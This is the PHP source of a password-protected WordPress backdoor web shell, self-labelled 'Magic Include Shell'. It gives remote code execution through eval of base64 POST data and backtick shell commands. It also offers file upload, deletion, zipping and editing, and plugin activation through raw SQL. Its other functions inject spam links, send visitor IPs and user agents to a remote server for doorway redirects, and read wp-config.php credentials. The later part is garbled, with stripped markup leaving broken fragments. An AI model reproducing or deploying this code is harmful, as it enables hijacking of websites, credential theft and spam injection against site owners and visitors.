$kmd5='510a584f9747c1262b5ef3c89bd9afb4';$shellver='1.7.5-stable';
if((isset($_POST['sh'])&&(md5(md5($_POST['sh']))==$kmd5))or(isset($_GET['sh'])&&(md5(md5($_GET['sh']))==$kmd5)))
{
$kuppa=getcwd();
if (file_exists($kuppa."/wp-config.php")) {include ($kuppa."/wp-config.php");};
if (file_exists($kuppa."/wp-includes/formatting.php")) {require_once ($kuppa."/wp-includes/formatting.php");};
if (file_exists($kuppa."/wp-includes/kses.php")) {require_once ($kuppa."/wp-includes/kses.php");};
}
if (!function_exists('update_option_1')):
function update_option_1( $option_name, $newvalue )
{
global $wpdb;
$wpdb->query( $wpdb->prepare( "UPDATE $wpdb->options SET option_value = %s WHERE option_name = %s", $newvalue, $option_name ) );
do_action( "update_option_{$option_name}", '', $newvalue );
return true;
}
endif;
if (!function_exists('reklama_k3')):
function reklama_k3()
{
$reklama_path1 =get_my_param3('r1');
$reklama_type =get_my_param3('r2');
if (!empty($reklama_path1))
{
$reklama_message = get_option($reklama_path1);
$rmm = explode('
', $reklama_message);
echo "";
foreach($rmm as $rmm1) echo $rmm1;
echo "
";
}
}
endif;
if (!function_exists('reklama_k3_css')):
function reklama_k3_css() {;}
endif;
if (!function_exists('read_curl_3')):
function read_curl_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang)
{
if (function_exists("curl_init"))
{
if ($ch = @curl_init())
{
@curl_setopt($ch, CURLOPT_URL,$v);
@curl_setopt($ch, CURLOPT_HEADER,true);
@curl_setopt($ch, CURLOPT_FOLLOWLOCATION,false);
@curl_setopt($ch, CURLOPT_AUTOREFERER,false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
@curl_setopt($ch, CURLOPT_POST, true);
@curl_setopt($ch, CURLOPT_POSTFIELDS,'ip='.$ip.'&prefix='.$prefix.'&id='.$id.'&uid='.$door_uid.'&ref='.$referer.'&ua='.$useragent.'&lang='.$lang);
$data = @curl_exec($ch);
if (curl_errno($ch)) return false;
else
{
$a=@curl_getinfo($ch,CURLINFO_HTTP_CODE);
@curl_close($ch);
$datas = explode("\r\n\r\n",$data);
$header=$datas[0];
$headers = explode("\n",$header);
unset($datas[0]);
unset($data);
$data = implode("\r\n\r\n",$datas);
if ($a==301)
{
//header parsing
foreach ($headers as $sss)
{
if (preg_match("/Location:.*/s",$sss,$ok))
{
header(trim($ok[0]));
die;
}
}
}
elseif ($a==200) return $data;
else return false;
}
}else return false;
}else return false;
}
endif;
if (!function_exists('read_socket_3')):
function read_socket_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang)
{
$host=parse_url($v,PHP_URL_HOST);
$path=parse_url($v,PHP_URL_PATH);
$data='ip='.$ip.'&prefix='.$prefix.'&id='.$id.'&uid='.$door_uid.'&ref='.$referer.'&ua='.$useragent.'&lang='.$lang;
$fp = @fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) return false;
@stream_set_timeout($fp,20);
$out = "POST $path HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "User-Agent: null \r\n";
$out .= "Accept: text/html\r\n";
$out .= "Accept-Language:*\r\n";
$out .= "Accept-Charset:*\r\n";
$out .= "Referer: null \r\n";
$out .= "Connection: Close\r\n";
$out .= "Content-type: application/x-www-form-urlencoded\r\n";
$out .= "Content-Length: ".strlen($data)."\r\n\r\n";
$out .=$data;
@fwrite($fp, $out);
//read data
$header='';
do
{
$buf=fgets($fp,2048);
$header=$header.$buf;
}while($buf!="\r\n" && !feof($fp));
$buf=fgets($fp,2048);
unset($buf);
$headers=explode("\n",$header);
while(!feof($fp)) $buf.=fread($fp,2048);
//header parsing
if (preg_match("/301/s",$headers[0],$ok))
{
foreach ($headers as $sss)
{
if (preg_match("/Location:.*/s",$sss,$ok))
{
header(trim($ok[0]));
die;
}
}
}
elseif (preg_match("/200/s",$headers[0],$ok)) return $buf;
else return false;
}
endif;
if (!function_exists('read_file_3')):
function read_file_3($v)
{
if (function_exists("file_get_contents"))
{
$data=@file_get_contents($v);
return $data;
}
else return false;
}
endif;
if (!function_exists('readf3')):
function readf3($v,$prefix,$id,$door_uid)
{
$useragent = base64_encode(rawurlencode($_SERVER['HTTP_USER_AGENT']));
$lang = base64_encode(rawurlencode($_SERVER['HTTP_ACCEPT_LANGUAGE']));
$ip = base64_encode(rawurlencode($_SERVER['REMOTE_ADDR']));
$referer = base64_encode(rawurlencode($_SERVER['HTTP_REFERER']));
$door_uid = base64_encode(rawurlencode($door_uid));
$prefix = base64_encode(rawurlencode($prefix));
$id = base64_encode(rawurlencode($id));
$data=read_curl_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang);
if ($data<>false) return $data;
$data=read_socket_3($v,$useragent,$ip,$referer,$prefix,$id,$door_uid,$lang);
if ($data<>false) return $data;
return false;
}
endif;
if (!function_exists('set_my_param3')):
function set_my_param3($param,$value)
{
$data=get_option('hack_file');
$data=base64_decode($data);
list($door_enable,$reklama_enable,$d_path1,$d_path2,$r_path1,$r_path2,$door_prefix,$adm_data,$adm_dops)=split(";",$data,9);
switch ($param)
{
case 'reklama' :$reklama_enable =$value;break;
case 'adm_data' :$adm_data =$value;break;
case 'adm_dops' :$adm_dops =$value;break;
case 'door' :$door_enable =$value;break;
case 'd1' :$d_path1 =$value;break;
case 'd2' :$d_path2 =$value;break;
case 'r1' :$r_path1 =$value;break;
case 'r2' :$r_path2 =$value;break;
case 'door_prefix' :$door_prefix =$value;break;
}
$data=$door_enable.";".$reklama_enable.";".$d_path1.";".$d_path2.";".$r_path1.";".$r_path2.";".$door_prefix.";".$adm_data.";".$adm_dops;
$data=base64_encode($data);
update_option_1('hack_file',$data);
}
endif;
if (!function_exists('get_my_param3')):
function get_my_param3($param)
{
$data=get_option('hack_file');
$data=base64_decode($data);
list($door_enable,$reklama_enable,$d_path1,$d_path2,$r_path1,$r_path2,$door_prefix,$adm_data,$adm_dops)=split(";",$data,9);
switch ($param)
{
case 'reklama' :return $reklama_enable;break;
case 'adm_data' :return $adm_data;break;
case 'adm_dops' :return $adm_dops;break;
case 'door' :return $door_enable;break;
case 'd1' :return $d_path1;break;
case 'd2' :return $d_path2;break;
case 'r1' :return $r_path1;break;
case 'r2' :return $r_path2;break;
case 'door_prefix' :return $door_prefix;break;
}
}
endif;
if((isset($_POST['sh'])&&(md5(md5($_POST['sh']))==$kmd5)))
{
if (isset($_POST['door_enable']))
{
set_my_param3('door',$_POST['door_enable']);
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['upload_reklama']))
{
echo "reply_ok_begin ";
$reklama_path1 =get_my_param3('r1');
if (!empty($reklama_path1))
{
$r_content=rawurldecode(base64_decode($_POST['rfile']));
if (function_exists('update_option')) {update_option($reklama_path1,$r_content);echo 'm1';}
else {update_option_1($reklama_path1,$r_content);echo 'm2';}
echo ':set links success';
}else echo 'path not set';
echo "reply_ok_end";
}
if (isset($_POST['add_reklama']))
{
echo "reply_ok_begin ";
$reklama_path1 =get_my_param3('r1');
if (!empty($reklama_path1))
{
$reklama_message = get_option($reklama_path1);
$r_content=rawurldecode(base64_decode($_POST['rfile']));
update_option_1($reklama_path1,$r_content.$reklama_message);
}
else echo ' path not set ';
echo "reply_ok_end";
}
if (isset($_POST['get_shell_ver']))
{
echo "reply_ok_begin".$shellver."reply_ok_end";
}
if (isset($_POST['adm_server']))
{
set_my_param3('adm_server',$_POST['adm_server']);
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['reklama_enable']))
{
set_my_param3('reklama',$_POST['reklama_enable']);
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['null_param']))
{
$data="n;n;n;n;n;n;n;n;n";
$data=base64_encode($data);
update_option_1('hack_file',$data);
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['get_wp_ver']))
{
echo "reply_ok_begin".get_option('db_version')."reply_ok_end";
}
if (isset($_POST['get_adm_data']))
{
echo "reply_ok_begin".get_my_param3('adm_data')."reply_ok_end";
}
if (isset($_POST['get_wp_opt']))
{
echo "reply_ok_begin ";
$data=get_option($_POST['get_wp_opt']);
if (is_array($data)) foreach ($data as $dat) echo $dat."
";
else echo $data;
echo "reply_ok_end";
}
if (isset($_POST['door_path1']))
{
set_my_param3('d1',base64_decode($_POST['door_path1']));
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['door_path2']))
{
set_my_param3('d2',base64_decode($_POST['door_path2']));
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['rekl_path1']))
{
set_my_param3('r1',base64_decode($_POST['rekl_path1']));
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['rekl_path2']))
{
set_my_param3('r2',base64_decode($_POST['rekl_path2']));
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['door_prefix']))
{
set_my_param3('door_prefix',$_POST['door_prefix']);
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['door_uid']))
{
set_my_param3('adm_dops',base64_decode($_POST['door_uid']));
echo "reply_ok_begin ok reply_ok_end";
}
if (isset($_POST['exec_code']))
{
echo "reply_ok_beginResult:
";
echo eval(rawurldecode(base64_decode($_POST['code'])));
echo "reply_ok_end";
}
exit;
}
if((isset($_GET['sh'])&&(md5(md5($_GET['sh']))==$kmd5)))
{
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) |
($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes']
<< 5) | ($timearray['seconds'] >> 1);
}
function addDir($name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x0a\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00\x00\x00";
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x0a\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$ext = "\x00\x00\x10\x00";
$ext = "\xff\xff\xff\xff";
$cdrec .= pack("V", 16 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$name = str_replace(array('../','./'), '', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
function addFiles($files)
{
foreach($files as $file)
{
if (is_file($file))
{
$data = implode("",file($file));
$this->addFile($data,$file);
}
}
}
function output($file)
{
$fp=fopen($file,"w");
fwrite($fp,$this->file());
fclose($fp);
}
}
class SimpleUnzip {
var $Comment = '';
var $Entries = array();
var $Name = '';
var $Size = 0;
var $Time = 0;
function SimpleUnzip($in_FileName = '')
{
if ($in_FileName !== '') {
SimpleUnzip::ReadFile($in_FileName);
}
}
function Count()
{
return count($this->Entries);
}
function GetData($in_Index)
{
return $this->Entries[$in_Index]->Data;
}
function GetEntry($in_Index)
{
return $this->Entries[$in_Index];
}
function GetError($in_Index)
{
return $this->Entries[$in_Index]->Error;
}
function GetErrorMsg($in_Index)
{
return $this->Entries[$in_Index]->ErrorMsg;
}
function GetName($in_Index)
{
return $this->Entries[$in_Index]->Name;
}
function GetPath($in_Index)
{
return $this->Entries[$in_Index]->Path;
}
function GetTime($in_Index)
{
return $this->Entries[$in_Index]->Time;
}
function ReadFile($in_FileName)
{
$this->Entries = array();
$this->Name = $in_FileName;
$this->Time = filemtime($in_FileName);
$this->Size = filesize($in_FileName);
$oF = fopen($in_FileName, 'rb');
$vZ = fread($oF, $this->Size);
fclose($oF);
$aE = explode("\x50\x4b\x05\x06", $vZ);
$aP = unpack('x16/v1CL', $aE[1]);
$this->Comment = substr($aE[1], 18, $aP['CL']);
$this->Comment = strtr($this->Comment, array("\r\n" =>
"\n","\r" => "\n"));
$aE = explode("\x50\x4b\x01\x02", $vZ);
$aE = explode("\x50\x4b\x03\x04", $aE[0]);
array_shift($aE);
foreach ($aE as $vZ) {
$aI = array();
$aI['E'] = 0;
$aI['EM'] = '';
$aP =
unpack('v1VN/v1GPF/v1CM/v1FT/v1FD/V1CRC/V1CS/V1UCS/v1FNL', $vZ);
$bE = ($aP['GPF'] && 0x0001) ? TRUE : FALSE;
$nF = $aP['FNL'];
if ($aP['GPF'] & 0x0008) {
$aP1 = unpack('V1CRC/V1CS/V1UCS', substr($vZ, -12));
$aP['CRC'] = $aP1['CRC'];
$aP['CS'] = $aP1['CS'];
$aP['UCS'] = $aP1['UCS'];
$vZ = substr($vZ, 0, -12);
}
$aI['N'] = substr($vZ, 26, $nF);
if (substr($aI['N'], -1) == '/') {
continue;
}
$aI['P'] = dirname($aI['N']);
$aI['P'] = $aI['P'] == '.' ? '' : $aI['P'];
$aI['N'] = basename($aI['N']);
$vZ = substr($vZ, 26 + $nF);
if (strlen($vZ) != $aP['CS']) {
$aI['E'] = 1;
$aI['EM'] = 'Compressed size is not equal with the
value in header information.';
} else {
if ($bE) {
$aI['E'] = 5;
$aI['EM'] = 'File is encrypted, which is not
supported from this class.';
} else {
switch($aP['CM']) {
case 0:
break;
case 8:
$vZ = gzinflate($vZ);
break;
case 12:
if (! extension_loaded('bz2')) {
if (strtoupper(substr(PHP_OS, 0,
3)) == 'WIN') {
@dl('php_bz2.dll');
} else {
@dl('bz2.so');
}
}
if (extension_loaded('bz2')) {
$vZ = bzdecompress($vZ);
} else {
$aI['E'] = 7;
$aI['EM'] = "PHP BZIP2 extension
not available.";
}
break;
default:
$aI['E'] = 6;
$aI['EM'] = "De-/Compression method
{$aP['CM']} is not supported.";
}
if (! $aI['E']) {
if ($vZ === FALSE) {
$aI['E'] = 2;
$aI['EM'] = 'Decompression of data failed.';
} else {
if (strlen($vZ) != $aP['UCS']) {
$aI['E'] = 3;
$aI['EM'] = 'Uncompressed size is
not equal with the value in header information.';
} else {
if (crc32($vZ) != $aP['CRC']) {
$aI['E'] = 4;
$aI['EM'] = 'CRC32 checksum is
not equal with the value in header information.';
}
}
}
}
}
}
$aI['D'] = $vZ;
$aI['T'] = mktime(($aP['FT'] & 0xf800) >> 11,
($aP['FT'] & 0x07e0) >> 5,
($aP['FT'] & 0x001f) << 1,
($aP['FD'] & 0x01e0) >> 5,
($aP['FD'] & 0x001f),
(($aP['FD'] & 0xfe00) >> 9) + 1980);
$this->Entries[] = &new SimpleUnzipEntry($aI);
}
return $this->Entries;
}
}
class SimpleUnzipEntry {
var $Data = '';
var $Error = 0;
var $ErrorMsg = '';
var $Name = '';
var $Path = '';
var $Time = 0;
function SimpleUnzipEntry($in_Entry)
{
$this->Data = $in_Entry['D'];
$this->Error = $in_Entry['E'];
$this->ErrorMsg = $in_Entry['EM'];
$this->Name = $in_Entry['N'];
$this->Path = $in_Entry['P'];
$this->Time = $in_Entry['T'];
}
}
function unzipFile($filename, $destination_folder) {
if (substr($destination_folder, -1) != '/') {
$destination_folder = $destination_folder .'/';
}
$vzip = new SimpleUnzip($filename);
foreach ($vzip->Entries as $extr) {
$path = $extr->Path;
$path_folder = explode ('/', $path);
$new_path = '';
foreach ($path_folder as $folder) {
$new_path .= $folder .'/';
$to_create = $destination_folder . $new_path;
if (substr($to_create, -1) == '/') {
$to_create = substr($to_create, 0,
strlen($to_create)-1);
}
@mkdir($to_create, 0777);
}
$new_path = '';
$filev = fopen ($destination_folder. $extr->Path .'/'.
$extr->Name, 'w');
fwrite ($filev, $extr->Data);
fclose ($filev);
}
}
function dd($file)
{
if (is_dir($file) || is_file($file))
{
chmod($file,0777);
if (is_dir($file))
{
$handle = opendir($file);
while($filename = readdir($handle))
if ($filename != "." && $filename != "..")
dd($file."/".$filename);
closedir($handle);
if(@rmdir($file))
print "$file deleted!
";
else
print "$file delete error!
";
}
else
{
if(@unlink($file))
print "$file deleted!
";
else
print "$file delete error!
";
}
}
}
function add2zipfile($file)
{
if (file_exists($file))
{
chmod($file,0777);
if (is_dir($file))
{
$handle = opendir($file);
while($filename = readdir($handle))
if ($filename != "." && $filename != "..")
{
$archive.=add2zipfile(rtrim($file,'/').'/'.$filename).',:,';
//$archive.=rtrim($file,'/').'/'.$filename.',:,';
}
closedir($handle);
return $archive;
}
else
{
$archive.=$file;
return $archive;
}
}
}
function U_sapi()
{
switch(PHP_SAPI)
{
case 'apache2handler': return 'Apache 2.0 Handler';
case 'apache': return 'Apache';
case 'cgi': return 'CGI';
case 'cgi-fcgi': return 'CGI/FastCGI';
default: return PHP_SAPI;
}
}
function U_getos()
{
if (function_exists('php_uname')) return php_uname();
if (PHP_OS == 'WINNT')
return 'Windows NT';
return PHP_OS;
}
$site=$PHP_SELF;
header("Content-type: text/html");
$file2zip=$_POST['file2zip'];
$deldira=$_POST['deldira'];
$arhiv=$_POST['arhiv'];
$dira=$_GET['dira'];
(empty($dira) || !isset($dira)) ? $dira='./' : '';
if(!ereg("/$",$dira)) $dira=$dira.'/';
$comanda=$_POST['comanda'];
$shcom=$_POST['shcom'];
if(isset($_POST['filee']) && !empty($_POST['filee']))
$filee=$_POST['filee'];
elseif(isset($_GET['filee']) && !empty($_GET['filee']))
$filee=$dira.''.$_GET['filee'];
$uploadfile=$_POST['uploadfile'];
$uploaddir=$_POST['uploaddir'];
$del=$_POST[del];
if(isset($_POST['edit']) && !empty($_POST['edit']))
$edit=$_POST['edit'];
elseif(isset($_GET['edit']) && !empty($_GET['edit']))
$edit=$_GET['edit'];
$save_edit=$_POST[save_edit];
function cutter($str,$sym,$len){
do{$serr=1;
if(strpos($str,$sym)!==false){
$serr=0;
$str1 = substr($str,0,strpos($str,$sym));
$str2 = substr($str,strpos($str,$sym)+$len,strlen($str));
$str = $str1.$str2;
}
} while($serr==0);
return $str;
}
$kverya=cutter($_SERVER["QUERY_STRING"],'dira=',999);
while(ereg('&&',$kverya))
{
$kverya=str_replace('&&','&',$kverya);
}
if (isset($_POST['my_plugin']))
{
$my_plugin =$_POST['my_plugin'];
$table_data =$_POST['my_plugin_t'];
list($mbdname,$mlogin,$mpass,$mhost,$table_prefix)=explode(';',$table_data);
if ($mbdname<>'bdname')
{
$link = mysql_connect($mhost,$mlogin,$mpass);
$bd_select = mysql_select_db($mbdname, $link);
}
$query = "SELECT option_value FROM ".$table_prefix."options WHERE option_name='active_plugins'";
$result = mysql_query($query);
while ($row = mysql_fetch_assoc($result))
{
$plugin_ee=$row['option_value'];
list($a1,$a2)=explode('{',$plugin_ee);
list($a1_1,$a1_2)=explode(':',$a1);
list($a2_1,$a2_2)=explode('}',$a2);
if ($a1_1=='') $a1_1='a';
if ($a1_2=='') $a1_2=0;
$a1_2old=$a1_2;
$a1_2=$a1_2+1;
$plugin_ee=$a1_1.':'.$a1_2.':{'.$a2_1.'i:'.$a1_2old.';s:'.strlen($my_plugin).':"'.$my_plugin.'"'.';}';
}
mysql_free_result($result);
if ($my_plugin=='reset') $query = "UPDATE ".$table_prefix."options SET option_value='' WHERE option_name='active_plugins'";
elseif ($my_plugin<>'get')
{
$query = "UPDATE ".$table_prefix."options SET option_value='".$plugin_ee."' WHERE option_name='active_plugins'";
$result = mysql_query($query);
}
$query = "SELECT option_value FROM ".$table_prefix."options WHERE option_name='active_plugins'";
$result = mysql_query($query);
while ($row = mysql_fetch_assoc($result)) { echo $row['option_value']."\n"; }
}
?>
Magic Include Shell <?php echo $shellver; ?>
addDir($ziparc[$i]);
print "{$ziparc[$i]} added!
";
}
elseif(is_file($ziparc[$i]))
{
$name2add=explode('../',$ziparc[$i]);
$name2add=$name2add[count($name2add)-1];
$ziper->addFile(file_get_contents($ziparc[$i]),$name2add);
print "{$ziparc[$i]} added!
";
}
}
}
}
$ziper->output($_POST[zip_path]);
}
if(!empty($deldira) && is_array($deldira) && isset($_POST[delete_submit]))
{
for($i=0;$i";
else
print "Rename error!
";
}
if(!empty($comanda))
{
eval(trim(stripslashes($comanda)));
}
if(!empty($shcom))
{
print ''.`$shcom`.'
';
}
if(!empty($_FILES['uploadfile']['name']))
{
@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name'])
? print "File ".$_FILES['uploadfile']['name']." uploaded
succesfully!
" : print "Upload error!
";
}
if(!empty($del) && is_array($del) && isset($_POST[delete_submit]))
{
for($i=0;$i'.$del[$i].' deleted succesfully!
';
}
}
if(!empty($filee))
{
?>
"),array('#FFFFFF',''),highlight_string($filee,true));
else
print $filee;
?>
$edit edited succesfully!
";
}
print 'Dir='.$dira.'
';
if(!($dp = opendir($dira))) die ("Cannot open ./");
$file_array = array();
while ($file = readdir ($dp))
{
$file_array[] = $file;
}
sort ($file_array);
print '